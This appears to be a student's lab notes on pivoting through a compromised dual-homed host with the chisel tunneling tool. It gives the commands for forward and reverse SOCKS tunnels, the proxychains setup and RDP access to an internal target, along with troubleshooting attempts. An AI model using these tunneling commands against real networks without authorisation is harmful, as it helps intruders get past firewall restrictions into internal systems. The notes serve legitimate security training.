# Introduction - `Chisel` is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data secured with SSH - With `chisel` we can create a client-server tunnel in a FW restricted environment - Assuming we have compromised a dual-homed pivot host, we can start a `chisel` server on the pivot host that will listen on a specific port and forward our traffic to the internal network through the established tunnel ![[images/Pasted image 20251023105308.png]] # Sequence for `chisel` forward pivot - Cloning `chisel` repo and building the binary ```bash git clone https://github.com/jpillora/chisel.git cd chisel go build ``` - Move `chisel` binary to pivot host ```bash scp chisel ubuntu@<external_ip_pivot_host>:~/ ``` - Setup `chisel` server on pivot host ```bash ./chisel server -v -p 1234 --socks5 ``` - Connect to `chisel` server on pivot host from Kali host ```bash ./chisel client -v <external_ip_pivot_host>:1234 socks ``` - Confirm correct entry in `/etc/proxychains4.conf` ```bash #last line of /etc/proxychains4.conf shoudl read socks5 127.0.0.1 1080 ``` - Use `chisel` and `proxychains4` to reach into the internal subnet ```bash proxychains4 xfreerdp3 /v:<internal_ip_target> /u:username /p:'<password>' ``` # Sequence for `chisel` reverse pivot - Useful when FW rules restrict inbound connections to our pivot host - Setup `chisel` server on Kali host ```bash sudo ./chisel server --reverse -v -p 1234 --socks5 ``` - Connect to `chisel` server on Kali host from pivot host ```bash ./chisel client -v <kali_host_ip>:1234 R:socks #R:socks option indicates reverse remotes ``` - Confirm correct entry in `/etc/proxychains4.conf` on Kali host ```bash #last line of /etc/proxychains4.conf shoudl read socks5 127.0.0.1 1080 ``` - Use `chisel` and `proxychains4` to reach into the internal subnet ```bash proxychains4 xfreerdp3 /v:<internal_ip_target> /u:username /p:'<password>' ``` # Exercise ## Attempt A - First, clone and build `chisel` ![[images/Pasted image 20251023104407.png]]![[images/Pasted image 20251023104423.png]]![[images/Pasted image 20251023104454.png]] - Second, move `chisel` binary to target with `scp` ![[images/Pasted image 20251023104905.png]]![[images/Pasted image 20251023104913.png]] - Third, start `chisel` server on pivot host ![[images/Pasted image 20251023105500.png]] - Running into error due to outdated version of `glibc` ![[images/Pasted image 20251023105521.png]] - Try to move `glibc-2.34/tar.gz` to pivot host and build - Running into errors ![[images/Pasted image 20251023111101.png]] ## Attempt B - Let's start over with an older version of `chisel` that works with `glibc-2.31`, which is available on pivot host ![[images/Pasted image 20251023111202.png]] ```bash #check GLIBC version ldd --version ``` - First, download `chisel` version 1.7.6 on Kali host ![[images/Pasted image 20251023111324.png]] - Second, decompress `chisel`![[images/Pasted image 20251023111830.png]] - Third, move `chisel` to pivot host ![[images/Pasted image 20251023111841.png]]![[images/Pasted image 20251023111852.png]] - Make `chisel` executable ![[images/Pasted image 20251023112033.png]] - Fourth, start `chisel` server on pivot host ![[images/Pasted image 20251023112103.png]] - Fifth, start `chisel` client on Kali host ![[images/Pasted image 20251023112216.png]] - Sixth, establish RDP connection to downstream Windows target - Leverage `proxychains4` - Errors ![[images/Pasted image 20251023112647.png]] ## Attempt C - Try chisel with port 1080 instead of 9050![[images/Pasted image 20251023112902.png]]![[images/Pasted image 20251023112907.png]] - We established a tunnel - Test connection to downstream Windows host ![[images/Pasted image 20251023112926.png]] - Attempt RDP connection ![[images/Pasted image 20251023113006.png]] - That worked: it didn't like us using the existing port 9050 in the in the `/etc/proxychains4.conf` file ![[images/Pasted image 20251023113307.png]]